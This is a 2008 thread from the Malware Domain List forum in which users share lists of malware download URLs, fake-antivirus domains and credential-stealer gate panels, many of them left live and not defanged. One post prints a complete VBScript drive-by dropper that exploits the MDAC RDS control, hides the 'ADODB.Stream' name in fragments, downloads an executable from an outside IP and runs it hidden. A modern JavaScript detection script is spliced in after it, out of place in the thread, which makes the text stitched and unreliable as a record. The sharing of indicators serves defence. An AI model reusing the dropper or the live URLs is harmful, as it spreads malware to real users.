Malware Domain List

Malware Related => Malicious Domains => Topic started by: lanvin on September 07, 2008, 07:26:41 pm

Title: daily something......
Post by: lanvin on September 07, 2008, 07:26:41 pm
Code:
http://218.22.180.43:81/445566.exe
http://first-reason.com/data/uhuybfgybff/0000005378.exe
http://dd5.tesekl.info/3.exe
http://www.cu108.com/linkme.exe
http://ruanjian2008.kki.cn/0.exe
http://ruanjian2008.kki.cn/2.exe
http://dd4.tesekl.info/not.exe

20080908...
Title: Re: daily something......
Post by: lanvin on September 08, 2008, 03:06:34 pm
Code:
http://www.qq-new.cn/shengji.exe
http://wm.xnibi.com/'http://m.c5x8.com/mm.exe
http://www.cu108.com/linkme.exe
http://www.zmjjjyy.cn/new/a2.css
http://down.hs7yue.cn/down/UU.ini
http://down.hs7yue.cn/down/sina.exe/

20080909
Title: Re: daily something......
Post by: lanvin on September 09, 2008, 03:33:27 pm
Code:
http://l.ljsrx.com/test222.exe
http://down.hs7yue.cn/down/sina.exe
http://www.zmjjjyy.cn/new/a1.css
http://61.164.118.208/new/new1.exe
http://61.164.118.208/new/new2.exe
http://61.164.118.208/new/new3.exe
http://61.164.118.208/new/new4.exe
http://61.164.118.208/new/new5.exe
http://61.164.118.208/new/new6.exe
http://61.164.118.208/new/new7.exe
http://61.164.118.208/new/new8.exe
http://61.164.118.208/new/new9.exe
http://61.164.118.208/new/new10.exe
http://61.164.118.208/new/new11.exe
http://61.164.118.208/new/new12.exe
http://61.164.118.208/new/new13.exe
http://61.164.118.208/new/new14.exe
http://61.164.118.208/new/new15.exe
http://61.164.118.208/new/new16.exe
http://61.164.118.208/new/new17.exe
http://61.164.118.208/new/new18.exe
http://61.164.118.208/new/new19.exe
http://61.164.118.208/new/new20.exe
http://61.164.118.208/new/new21.exe
http://61.164.118.208/new/new22.exe
http://61.164.118.208/new/new23.exe
http://61.164.118.208/new/new24.exe
http://61.164.118.208/new/new25.exe
http://61.164.118.208/new/new26.exe
http://61.164.118.208/new/new27.exe
http://61.164.118.208/new/new28.exe
Title: Re: daily something......
Post by: sowhat-x on September 09, 2008, 04:24:02 pm
Quote
hxxp://av355.110mb.com/gate/gate.php?stat=1
hxxp://magmob.info-com.ru/gate/gate.php
hxxp://www.cybertm.tu1.ru/admin/admin.php
hxxp://www.dmc-dmc.1gb.in/gate/gate.php
hxxp://www.patr0n87.tu2.ru/reports/gate.php
hxxp://www.qsl.net/dl2bcm/
hxxp://www.anti-virus-xp.net/sysscan/132a071e5d1437b80c401c6982d513a0/1/
hxxp://www.anti-virus-xp.net/tools/virusremover.dll
hxxp://www.anti-virus-xp.net/check/132a071e5d1437b80c401c6982d513a0_16
hxxp://82.98.235.15/wupd/
Title: Re: daily something......
Post by: lanvin on September 10, 2008, 02:10:34 pm
Code:
http://222.179.185.117/1.exe
http://222.179.185.117/2.exe
......
http://222.179.185.117/30.exe
http://newymhf6.cn/3.exe
http://l.ljsrx.com/test222.exe
Title: Re: daily something......
Post by: sowhat-x on September 11, 2008, 01:45:17 am
Quote
hxxp://xpsecuritycenter.com/XPSecurityCenter/latest/Installer.exe
hxxp://scan.antispyware-free-scanner.com
hxxp://files.as-pro-xp-download.com/load/setup_1_2_.exe
hxxp://virusremover2008.com/VRM_Free.exe?a=site&l=pay
hxxp://download.virusremover2008.com/VRM_Free.exe
hxxp://www.av-xp2008.com
hxxp://stat.av-xp2008.com/download/16/AntivirusXP2008Installer.exe

And what a surprise, lol... more crap hosted on the same IP obviously...
Quote
hxxp://antivirusxp-2008.net (EstDomains)
hxxp://stat.antivirusxp-2008.net/download/16/AntivirusXP2008Installer.exe (EstDomains)
Title: Re: daily something......
Post by: lanvin on September 11, 2008, 01:54:59 pm
Code:
http://user9.78-10.net/list/sk01.exe
http://user9.78-10.net/list/sk02.exe
http://user9.78-10.net/list/sk03.exe
http://user9.78-10.net/list/sk04.exe
http://user9.78-10.net/list/sk05.exe
http://user9.78-10.net/list/sk06.exe
http://user9.78-10.net/list/sk07.exe
http://user9.78-10.net/list/sk08.exe
http://user9.78-10.net/list/sk09.exe
http://user9.78-10.net/list/sk10.exe
http://user9.78-10.net/list/sk11.exe
http://user9.78-10.net/list/sk12.exe
http://user9.78-10.net/list/sk13.exe
http://user9.78-10.net/list/sk14.exe
http://user9.78-10.net/list/sk15.exe
http://user9.78-10.net/list/sk16.exe
http://user9.78-10.net/list/sk17.exe
http://user9.78-10.net/list/sk18.exe
http://user9.78-10.net/list/sk19.exe
http://user9.78-10.net/list/sk20.exe
http://user9.78-10.net/list/sk21.exe
http://user9.78-10.net/list/sk22.exe
http://user9.78-10.net/list/sk23.exe
http://user9.78-10.net/list/sk24.exe
http://user9.78-10.net/list/sk25.exe
http://user9.78-10.net/list/sk26.exe
http://user9.78-10.net/list/sk27.exe
http://user9.78-10.net/list/sk28.exe
http://user9.78-10.net/list/sk29.exe
http://user9.78-10.net/list/sk30.exe
Title: Re: daily something......
Post by: SysAdMini on September 11, 2008, 03:25:09 pm
Read this blog article
http://s3cwatch.wordpress.com/2008/09/11/wwwok2bstr8comindex_13html/

There is a lot more of such crap.

http://www.google.com/search?q=%22ActiveX+Object+to+play+this+video+file%22+%22HARDCORE+VIDEO+ONLINE%22&site=intl&filter=0

Example from Google links:

Code:
www.hot9.ru/index.php?p_id=138

links to

Code:
http://softload2009q.com/download/502/1410/0/
downloads MediaTubeCodec_ver1.1410.0.exe.

VT Result:

http://www.virustotal.com/de/analisis/e040a14bb3b30e35eaf59a141d5e37b6
Title: Re: daily something......
Post by: lanvin on September 12, 2008, 07:03:23 pm
Code:
http://www.host1550.com/modulos/gera.jpg
http://loaddds.com/file.exe
http://security-prof.com/2009/download/trial/AV2009Install_77024207.exe
http://m.c5x8.com/mm.exe
Title: Re: daily something......
Post by: sowhat-x on September 13, 2008, 03:10:34 am
Quote
hxxp://www.skigiesing.de/bilder/kashir.exe
hxxp://fotolog.host.sk/foto.php?=
hxxp://on1000000.cn/Get7IT.php
hxxp://ferrychi445677.com/Get7ITU.php -> -> EstDomains
hxxp://bmwx6foreva.ru/loads/engine3.bin
hxxp://my-socks.info/lll.exe -> EstDomains
hxxp://de-my-page.info/img/scan_trCRY.exe -> EstDomains
hxxp://79.132.211.50/alex/1.exe
hxxp://58.65.235.41/ndl/index.php -> control panel, pretty lame ;-)
hxxp://58.65.235.41/ndl/controller.php?action=bot&entity_list=&rnd=982142
hxxp://monsterlink.org/spl/exe.php
hxxp://www.0xfffffffff.net/spl/index.php
hxxp://165.194.30.123/qwerty/traf.php
hxxp://rivatos.net/tds/in.cgi?default -> EstDomains
hxxp://rivatos.net/in.cgi?idb1
hxxp://rivatos.net/tds/in.cgi?3
hxxp://rivatos.net/tds/in.cgi?2
hxxp://myfrooogle.cn/z/index.php
hxxp://onlinececk.com/ -> pdf exploits also in the past there as well / EstDomains
hxxp://www.anti-virus-xp.net/sysscan/132a071e5d1437b80c401c6982d513a0/1/
hxxp://www.anti-virus-xp.net/check/132a071e5d1437b80c401c6982d513a0_16
hxxp://www.anti-virus-xp.net/tools/virusremover.dll
hxxp://guidetosuccess.name/images/index.php -> EstDomains
hxxp://guidetosuccess.name/images/ff.jar
hxxp://guidetosuccess.name/images/ff2.jar
hxxp://guidetosuccess.name/images/lv.jar
hxxp://guidetosuccess.name/images/ff4.jar
hxxp://guidetosuccess.name/images/ff3.jar
hxxp://guidetosuccess.name/images/ff5.jar
hxxp://guidetosuccess.name/images/ff7.jar
hxxp://guidetosuccess.name/images/ff12.jar
hxxp://guidetosuccess.name/images/ff6.jar
hxxp://guidetosuccess.name/images/ff8.jar
hxxp://guidetosuccess.name/images/ff9.jar
hxxp://guidetosuccess.name/images/ff13.jar
hxxp://guidetosuccess.name/images/ff14.jar
hxxp://guidetosuccess.name/images/ff10.jar
hxxp://guidetosuccess.name/images/ff15.jar
hxxp://guidetosuccess.name/images/ff11.jar
hxxp://guidetosuccess.name/images/loade.php
Title: Re: daily something......
Post by: lanvin on September 13, 2008, 10:09:30 am
Code:
http://www.qq-songli.cn/001.exe
http://www.qq-songli.cn/002.exe
http://www.qq-songli.cn/003.exe
http://www.qq-songli.cn/004.exe
http://www.qq-songli.cn/005.exe
http://www.qq-songli.cn/006.exe
http://www.qq-songli.cn/007.exe
http://www.qq-songli.cn/008.exe
http://w.stopcao.cn/good/x.exe
http://www.zmjjjyy.cn/down/ko.exe
http://down.hs7yue.cn/down/ko.css
Title: Re: daily something......
Post by: lanvin on September 14, 2008, 09:54:25 am
Code:
Site Domain: 0catch.com
Site Location: United States of America
Threat Links on this site (part of them):

http://wrkshp14.0catch.com/kettlebells-uk.html 
http://jyg7321.0catch.com/ 
http://wrkshp5.0catch.com/scorpio-tattoo.html 
http://keaydi.0catch.com/ 
http://wrkshp14.0catch.com/hoist-dumbbells.html 
http://wrkshp15.0catch.com/campbells-chicken-noodle-soup.html 
http://wrkshp14.0catch.com/custom-doorbells.html 
http://wrkshp14.0catch.com/crazy-fogs-jingle-bells-mp3.html 
http://wrkshp14.0catch.com/deagan-bells.html 
http://pedomederpel.0catch.com/


Site Domain: 218.22.180.43
Site Location: China
Threat Links on this site (part of them):

http://218.22.180.43:81/vmdetdhc.htm 
http://218.22.180.43/TuTu01.exe 
http://218.22.180.43/w.exe 
http://218.22.180.43/w.exe 
http://218.22.180.43:81/445566.exe 

Title: Re: daily something......
Post by: CM_MWR on September 14, 2008, 10:57:37 am
Thanks Lanvin, I somehow missed this topic but much appreciate the links.  :P

Code:
http://lovelypornovideo.net/load.php?aff=&/HDVideoCodec_ver1..0.exe
http://pornotube30.net/getsoft/79_003.exe
http://usuarios.lycos.es/libredll/udp.nnn
http://ranchsource.com/files/778r.jpg
http://ranchsource.com/files/777.jpg
http://files657284.net/b2b/dmlatc.cgi
http://files657284.net/b2b/load/nlatdm.exe
http://files657284.net/b2b/load/vmairn.exe
http://files657284.net/b2b/load/djdnxl.exe
http://www.moduloscriticos.com.br/mod/configdw.txt
http://www.moduloscriticos.com.br/mod/imlog.jpg
http://www.moduloscriticos.com.br/mod/imbdj.jpg
http://www.moduloscriticos.com.br/mod/implug.jpg
http://www.moduloscriticos.com.br/mod/immsn.jpg
http://www.moduloscriticos.com.br/mod/imok.jpg
http://www.moduloscriticos.com.br/mod/config.jpg
http://www.moduloscriticos.com.br/mod/mslink.jpg
http://75.125.233.171/julho/imlog.jpg
http://www.marajo03.kit.net/imbdj.jpg
http://75.125.233.171/julho/implug.jpg
http://www.marajo00.kit.net/imok.jpg
http://avzhan.3322.org:81/1.exe
http://78.157.143.251/bho/msfont.dll
http://m.c5x8.com/mm.exe
http://www.sognilucidi.it/forum/download/.http/~/foto1.jpg
http://goldbye.vicp.net/svchost1.exe
http://goldbye.vicp.net/Cyber02Hide.exe
http://omega-sts.ru/usr/templates/CVS/.dc/visualizador
http://globalcenter.home.sapo.pt/1.gif
http://globalcenter.home.sapo.pt/2.gif
http://globalcenter.home.sapo.pt/3.gif
http://transito2009.web26.f3.k8.com.br/msmask32.jpg
http://transito2009.web26.f3.k8.com.br/ossmtp.jpg
http://transito2009.web26.f3.k8.com.br/estrela.jpg
http://transito2009.web26.f3.k8.com.br/file_new.jpg
http://www.florenca2009.com/config/config.dll
Title: Re: daily something......
Post by: lanvin on September 14, 2008, 03:37:00 pm
Quote from: CM_MWR on September 14, 2008, 10:57:37 am
Thanks Lanvin, I somehow missed this topic but much appreciate the links.  :P
[...]

dig from your post :)

Code:
http://75.125.233.171/mod/modplug14.jpg
http://m.c5x8.com/flashmm.exe 
http://m.d5x8.com/dd/9.exe
http://m.c5x8.com/dd/3.exe
http://2.trojan8.com/dd/10.exe
http://m.c5x8.com/dd/2.exe
http://m.c5x8.com/dd/1.exe
Title: Re: daily something......
Post by: SysAdMini on September 14, 2008, 05:45:49 pm
Code:
http://reda-vision.com/config.exe
http://www.virustotal.com/analisis/a10b9cdb94e166d12caed1093db639ac

More info about it here

http://www.cs.ucsb.edu/~marco/blog/2008/09/backdoored-php-shells.html
Title: Re: daily something......
Post by: JohnC on September 14, 2008, 09:24:40 pm
Thank you.
Title: Re: daily something......
Post by: sowhat-x on September 15, 2008, 12:04:25 am
Quote
hxxp://193.33.61.169/cntr.gif
hxxp://91.203.92.25/hvha/4683lt.exe
hxxp://ksn.a1001186.wrs.flutix.com/meane.stf
hxxp://lolika.cn/docs/us.txt
hxxp://lolika.cn/docs/us2.txt
hxxp://lolika.cn/docs/us3.txt
hxxp://www.mediacodec.co.cc/justplayit.exe

Pinches here...
Quote
hxxp://ks4sk.fatal.ru/1/1.php
hxxp://mechta2.freehostia.com    -> Open dir, check for logs and other stuff there...
hxxp://skkeyg.freehostia.com      -> Open dir, check for logs and other stuff there...

Hunting for Pinches really pays back sometimes...
Quote
hxxp://c.bestnews.cc/e/buf.png -> Result: 0/36 (0%)
http://www.virustotal.com/analisis/54a9ba01bdd03fce710d9cceafb0d2e4

hxxp://c.bestnews.cc/e/mov.qt -> Result: 2/36 (5.56%)
http://www.virustotal.com/analisis/5ac531f64205150158da7b6d6153e8ea

hxxp://c.bestnews.cc/file.php?o=7&q=2&w=fire -> Result: 13/36 (36.12%)
http://www.virustotal.com/analisis/bad64f314a091e12a1957a252cd3f5c0

Also dug a webshell from there...
Quote
hxxp://bestnews.cc/tools.rar

All stuff from bestnews.cc added in attachment, note that it's NOT password-protected...
Title: Re: daily something......
Post by: lanvin on September 15, 2008, 04:24:28 am
Code:
http://91.203.92.25/hvha626/s6c4n6s.exe
http://91.203.92.25/hvha123/ex32de.exe
http://ksn.a.wrs.mcboo.com/17PHolmes.cmt
http://ksn.a.wrs.flutix.com/meane.stf
http://lolika.cn/docs/tips.txt (MZ)

dig.......:)
Title: Re: daily something......
Post by: lanvin on September 15, 2008, 02:06:34 pm
Code:
http://2.trojan8.com/dd/1.exe
http://2.trojan8.com/dd/2.exe
http://2.trojan8.com/dd/6.exe
http://2.trojan8.com/dd/9.exe
Title: Re: daily something......
Post by: lanvin on September 16, 2008, 11:31:15 am
Code:
zango.com 
http://downloads.zango.com/zangogames/chamber/setupchamber2848.exe
http://downloads.zango.com/zangogames/dvg/setupdavid2365.exe
http://downloads.zango.com/zangogames/zangotv/setupzangotv2593.exe
http://downloads.zango.com/zangogames/library/setuplibrary2797.exe
http://ftp.surfnet.nl/simtel/win95/secsys/passpectpro32.exe

180solutions.com 
http://bis.180solutions.com/downloads/msbb.exe


hotbar.com 
http://installs.hotbar.com/installs/hotbar/programs/hotbar.exe
http://www.hbdownloads.com/installs/hotbar/programs/hotbarinst.exe
http://installs.hotbar.com/installs/hbtools/programs/hbtools.exe
http://installs.hotbar.com/installs/hbtools/programs/hbtools.cab
http://installs2.hotbar.com/installs/hotbar/programs/hotbar.exe


zangocash.com
http://static.zangocash.com/Setup/53/Zango/Setup.exe 
http://static.zangocash.com/Setup/53/Seekmo/Setup.exe 



please dig
Code:
gophergas.com
albinoblacksheep.com 
simtel.net 
Title: Re: daily something......
Post by: SysAdMini on September 16, 2008, 11:42:33 am
Code:
www.ulitka.de
has code

Code:
<SCRIPT language=VBScript>
    on error resume next

    ' payload to fetch
    dl = "http://210.202.194.167/banco.exe"

    ' RDS.DataSpace (the MDAC control patched by MS06-014); its CreateObject
    ' is used as a factory so the script never instantiates the objects directly
    Set df = document.createElement("object")
    df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"

    ' XMLHTTP does the download
    str="Microsoft.XMLHTTP"
    Set x = df.CreateObject(str,"")

    ' "ADODB.Stream" assembled from four fragments to dodge string signatures
    a1="Ado"
    a2="db."
    a3="Str"
    a4="eam"
    str1=a1&a2&a3&a4
    str5=str1
    set S = df.createobject(str5,"")
    S.type = 1 ' adTypeBinary

    str6="GET"
    x.Open str6, dl, False
    x.Send

    ' file name exactly as found in the page; BuildPath prefixes the temp folder
    fname1="http://www.ulitka.de/index2.html"
    set F = df.createobject("Scripting.FileSystemObject","")
    set tmp = F.GetSpecialFolder(2) ' Get tmp folder
    fname1= F.BuildPath(tmp,fname1)

    ' write the response body to disk
    S.open
    S.write x.responseBody
    S.savetofile fname1,2 ' adSaveCreateOverWrite
    S.close

    ' run the dropped file with a hidden window
    set Q = df.createobject("Shell.Application","")
    Q.ShellExecute fname1,"","","open",0
</SCRIPT>

to download

Code:
http://210.202.194.167/banco.exe
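The fragment trick in the script above (a1&a2&a3&a4 becomes the ADODB.Stream ProgID at run time) is exactly why a plain search for "ADODB.Stream" in page source misses this dropper. As an added example, not code from the post or from the malware, here is a small JavaScript triage script that re-assembles VBScript string variables from literal assignments and & concatenations, then reports the COM ProgIDs, CLSIDs and URLs the script actually uses. The sample input is the dropper quoted above, embedded as a constant; the ProgID list is an assumption chosen for this family of droppers, not a complete catalogue.

```javascript
// Added example (not from the forum post): resolve VBScript string
// concatenation so that split ProgIDs like "Ado"&"db."&"Str"&"eam" become
// visible, then list the COM objects, CLSIDs and URLs the dropper uses.

// Sample input: the VBScript dropper quoted in this thread, embedded verbatim.
const SAMPLE_VBS = `<SCRIPT language=VBScript>
    on error resume next
    dl = "http://210.202.194.167/banco.exe"
    Set df = document.createElement("object")
    df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
    str="Microsoft.XMLHTTP"
    Set x = df.CreateObject(str,"")
    a1="Ado"
    a2="db."
    a3="Str"
    a4="eam"
    str1=a1&a2&a3&a4
    str5=str1
    set S = df.createobject(str5,"")
    S.type = 1
    str6="GET"
    x.Open str6, dl, False
    x.Send
    fname1="http://www.ulitka.de/index2.html"
    set F = df.createobject("Scripting.FileSystemObject","")
    set tmp = F.GetSpecialFolder(2) ' Get tmp folder
    fname1= F.BuildPath(tmp,fname1)
    S.open
    S.write x.responseBody
    S.savetofile fname1,2
    S.close
    set Q = df.createobject("Shell.Application","")
    Q.ShellExecute fname1,"","","open",0
</SCRIPT>`;

// ProgIDs worth flagging in browser-delivered VBScript (assumed list for this
// dropper family, not an exhaustive catalogue).
const SUSPICIOUS_PROGIDS = [
  'ADODB.Stream', 'Microsoft.XMLHTTP', 'Scripting.FileSystemObject',
  'Shell.Application', 'WScript.Shell',
];

// Walk the script once, evaluating `name = "lit" & other & "lit"` assignments.
// Anything that is not a literal or an already-known variable is skipped, so
// calls like document.createElement("object") never pollute the table.
function resolveVbStrings(src) {
  const vars = new Map();
  const assignment = /^(?:set\s+)?([A-Za-z_]\w*)\s*=\s*(.+?)\s*(?:'.*)?$/i;
  for (const raw of src.split(/\r?\n/)) {
    const m = assignment.exec(raw.trim());
    if (!m) continue;
    const [, name, rhs] = m;
    let value = '';
    let resolved = true;
    // VBScript concatenates with &; the literals here contain no &, so a plain split is enough.
    for (const piece of rhs.split('&').map((p) => p.trim())) {
      const lit = /^"(.*)"$/.exec(piece);
      if (lit) value += lit[1];
      else if (vars.has(piece)) value += vars.get(piece);
      else { resolved = false; break; }
    }
    if (resolved) vars.set(name, value);
  }
  return vars;
}

// Combine raw string literals with resolved variables and classify them.
function extractIndicators(src) {
  const literals = [...src.matchAll(/"([^"]*)"/g)].map((m) => m[1]);
  const strings = new Set([...literals, ...resolveVbStrings(src).values()]);
  // ProgIDs are case-insensitive in COM, so compare lower-cased.
  const progids = SUSPICIOUS_PROGIDS.filter((p) =>
    [...strings].some((s) => s.toLowerCase() === p.toLowerCase()));
  const classids = [...src.matchAll(/clsid:([0-9A-F]{8}(?:-[0-9A-F]{4}){3}-[0-9A-F]{12})/gi)]
    .map((m) => m[1].toUpperCase());
  const urls = [...strings].filter((s) => /^https?:\/\/\S+$/i.test(s));
  return { progids, classids: [...new Set(classids)], urls };
}

// Stand-alone run: print what the dropper really instantiates.
console.log(JSON.stringify(extractIndicators(SAMPLE_VBS), null, 2));
```

The resolver is deliberately dumb: it only follows literal assignments and & chains, which is all this sample needs. Scripts that build strings with Chr(), Mid() or Replace() need a real VBScript interpreter, but the output here (the reassembled ProgID next to the CLSID and download URL) is what you want in a detection signature or a triage note.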
Title: Re: daily something......
Post by: JohnC on September 16, 2008, 06:59:05 pm
Thanks.
Title: Re: daily something......
Post by: lanvin on September 17, 2008, 06:43:20 am
Code:
prtectionactivescan.com

http://softwaredesign6.com/2009/download/trial/A9loader_770522160214.exe
http://prtectionactivescan.com/2009/download/trial/A9loader_770522164720.exe
http://prtectionactivescan.com/2009/download/trial/A9loader_77052201.exe
http://prtectionactivescan.com/2009/download/trial/A9loader_770522164437.exe

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

http://www.freewebs.com/chipxinh503/GirlKuTe.exe

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

http://www.cao-2.cn/Real10.js
http://www.cao-1.cn/Real10.js
http://202.106.195.23:6688/aicss_test241.css (invalid)

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

as-pro-xp-download.com

http://files.as-pro-xp-download.com/load/setup_100525_3_.exe 
http://files.as-pro-xp-download.com/load/setup_110084_3_.exe 
http://files.as-pro-xp-download.com/load/setup_110102_3_.exe 
http://files.as-pro-xp-download.com/load/setup_100525_6_.exe 
http://files.as-pro-xp-download.com/load/setup_110151_3_.exe

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Title: Re: daily something......
Post by: lanvin on September 18, 2008, 11:15:12 am
Code:
91.121.138.222

http://91.121.138.222/~warman24/Setup_ver1.1706.0.exe
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
allinonespy.com

http://www.allinonespy.com/all-in-one-spy.exe
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.ppexe.com/

http://www.ppexe.com/comine/2.exe 
http://www.ppexe.com/comine/mfrj.exe 
http://www.ppexe.com/comine/dwbins.exe   
http://www.ppexe.com/comine/wowoaa.exe 
http://www.ppexe.com/comine/mf.exe 
http://www.ppexe.com/comine/ffxi369.exe 
http://www.ppexe.com/new/1.exe 
http://www.ppexe.com/comine/mf.exe
http://www.ppexe.com/comine/db820.exe
Title: Re: daily something......
Post by: lanvin on September 19, 2008, 08:17:21 am
Code:
blazingtools.com

http://www.blazingtools.com/downloads/i_bpk2003.exe
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
swmirror.com

http://dreamingsoft.swmirror.com/fcsetup.exe
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
blazingtools.com

http://www.blazingtools.com/downloads/i_bpk2003.exe
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
facaizhifuok.cn

http://facaizhifuok.cn/hb/1.exe
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Title: Re: daily something......
Post by: CM_MWR on September 19, 2008, 09:46:23 am
Thanks Lanvin,

Some fun to play with

hxxp://rtrbenews.com/svchost.exe
hxxp://rtrbenews.com/svchost2.exe
hxxp://rtrbenews.com/svchost3.exe
hxxp://ontilop.net/_stub.exe
hxxp://wirexgold.com/explorer.exe
hxxp://rondolook.net/_stub.exe
hxxp://rondolook.net/123.exe
hxxp://wapbrazil.nexenservices.com/image/Gbsvs.exe
hxxp://79.135.167.18/sl32.exe
hxxp://79.135.167.18/scan4.exe
hxxp://79.135.167.18/cgi-bin/index.cgi?test2
hxxp://79.135.167.18/gpls32.exe1
hxxp://www.blogouf.com/images/closeframe.gif
hxxp://www.blogouf.com/images/logo-blogoufbig.gif
hxxp://wapbrazil.nexenservices.com/image/sys_Java.exe
hxxp://66.90.104.196/Autoupdate/Setup_ver1.1494.0.exe
hxxp://loaddds.com/file.exe
hxxp://sexoon.ifrance.com/link.jpg
hxxp://78.157.143.251/bho/msfont.dll
hxxp://www.gondolatriveneto.com/img/categorie/9_mai_big.jpg
hxxp://www.modulog2008.hpgvip.com.br/themida.jpg
hxxp://www.modulog2008.hpgvip.com.br/dynamic.jpg
hxxp://www.host1550.com/modulos/modulo.jpg
hxxp://www.host1550.com/modulos/gera.jpg
hxxp://www.host1550.com/modulos/plugin.jpg
hxxp://www.host1550.com/modulos/net.jpg
hxxp://www.host1550.com/modulos/msn.jpg
hxxp://www.host1550.com/modulos/orkut.jpg
hxxp://lovelypornovideo.net/load.php?aff=&/HDVideoCodec_ver1..0.exe
hxxp://pornotube30.net/getsoft/79_003.exe
hxxp://lidahua.3322.org/gz.exe
hxxp://lidahua.3322.org/jzllw.exe
hxxp://lidahua.3322.org/doudou.exe
hxxp://lidahua.3322.org/Down1.exe
hxxp://lidahua.3322.org/waigua.exe
hxxp://sortesorte009.mail333.su/familia.gif
hxxp://www.death-note.biz/up/img/22752.exe
hxxp://satellife.info/?&v=2608kj&lid=1033
hxxp://v2count.net/cc/ccdo.php?affid=5
hxxp://v2count.net/cc/srtytrewqertytrew.php?affid=5&code1=HOPH&code2=1257
hxxp://v2count.net/out/search.jpg
hxxp://v2count.net/out/winlogon.jpg
hxxp://v2count.net/out/tibs.jpg
hxxp://v2count.net/out/tool.jpg
hxxp://v2count.net/out/proxy.jpg
hxxp://russia-vs-georgia.org/admin/load.php?id=500357855
hxxp://freee.lviv.name/antivir/scan.exe
hxxp://freee.lviv.name/antivir/serv.exe
hxxp://freee.lviv.name/antivir/Setup_ver1.1254.0.exe
hxxp://freee.lviv.name/antivir/silent.exe
hxxp://www.ltb.com.co/portal/modules/pagesetter/doc/default/irs_efill.php

---------------------

208.66.194.232/40E8000842CFEBBCE21EFAC86C0000006866000000007600000147EB0005306A70777F
78.157.142.26/files/42/v2test7/file.exe
85.255.118.29/ppc/config.php?v=19&u=3259&acln=en-us&s=hxxp://www.google.com/&sch=n
85.255.118.29/ppc/config.phpchk
91.203.92.25/hvha626/s6c4n6s.exe
a486.g.akamai.net/wzcline23.exe
anti-virus-xp.net/images/1221042566/59d422a3203c189a5a485ed62282d44d/f13b3635-68ca-4d6d-95e4-3fe0ff04661f.gif
anti-virus-xp.net/images/1221042578/59d422a3203c189a5a485ed62282d44d/f13b3635-68ca-4d6d-95e4-3fe0ff04661f.ok?id=16
anti-virus-xp.net/images/1221043179/59d422a3203c189a5a485ed62282d44d/f13b3635-68ca-4d6d-95e4-3fe0ff04661f.gif
googlescanners-360.com/2009/100/freescan.php?aid=880724
googlescanners-360.com/2009/download/trial/AV2009Install_880724.exe
total-secure2009.com/download.php
totalsecuredownload.com/TotalSecure2009.exe
xww.panel911.com/traffic/in.cgi?google1
xww.panel911.com/traffic/in.cgi?hunter
zonephp.com/del/us.exe
zonephp.com/del/us.php?1=duhme_0008dc42&i=
zonephp.com/del/us.php?2=duhme_0008dc42&n=0&v=16778773&i=&s=0&sp=0&lcp=0&pr=0
zonephp.com/del/us.php?2=duhme_0008dc42&n=1&v=16778773&i=&s=0&sp=0&lcp=0&pr=0
zonephp.com/del/userror
zonephp.com/ld.php?v=1&id=27718&rs=2087256932&cc=0
zonephp.com/ld.php?v=1&rs=2087256932
Title: Re: daily something......
Post by: lanvin on September 19, 2008, 03:15:57 pm
Quote from: CM_MWR on September 19, 2008, 09:46:23 am
Thanks Lanvin,

Some fun to play with

~~~~~
Hi CM_MWR,
Thank you very much  :)
Title: Re: daily something......
Post by: sowhat-x on September 19, 2008, 03:17:29 pm
Quote
hxxp://mr-z.ru/logs2/BlackWM222.exe

Quote
hxxp://0smp.ru/gpack/admin.php
hxxp://finito.fi.funpic.org/black/auth.php

Quote
hxxp://forsakens.freehostia.com/gate/
hxxp://pinch.freehostia.com/
hxxp://test.bboys.tu2.ru/gate.php
hxxp://www.tihvin.tu2.ru/italy/gate.php
Title: Re: daily something......
Post by: sowhat-x on September 19, 2008, 03:21:52 pm
And a special one as well, lol... that also earned Google's malware prevention warning, he-he...
http://www.google.com/search?hl=en&q=dlockley.com
Quote
hxxp://dlockley.com/
Title: Re: daily something......
Post by: lanvin on September 20, 2008, 07:55:20 am
Code:
http://mdrop.md.funpic.org/habbo%20tools/flooder/macrotool.exe
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://hipapatam.com/Client20.1531.0.exe
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://dl-updates.freehostia.com/vc.txt    (pe)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.bopings.com/a.exe
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.kasdbrs.com/ld_vp002.exe
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Title: Re: daily something......
Post by: lanvin on September 21, 2008, 09:46:39 am
Code:
http://www.6rb-ksa.com/vip.exe
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://tudoforum.webcindario.com/verdinho.jpg   PE
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.pointcashbag.com/cashback/download/install.exe
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://avzhan.3322.org:81/1.exe
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://lyon2008.sitesled.com/image09776554foto01.exe
http://blackman717.sitesled.com/instal-tv-sexe-24h.exe
http://gaming3d.sitesled.com/DragonBot_3_FullSetup.exe
http://gaming3d.sitesled.com/sexbot_fullsetup.exe
http://gaming3d.sitesled.com/gzn_setup.exe
http://voce.sitesled.com/veja.exe
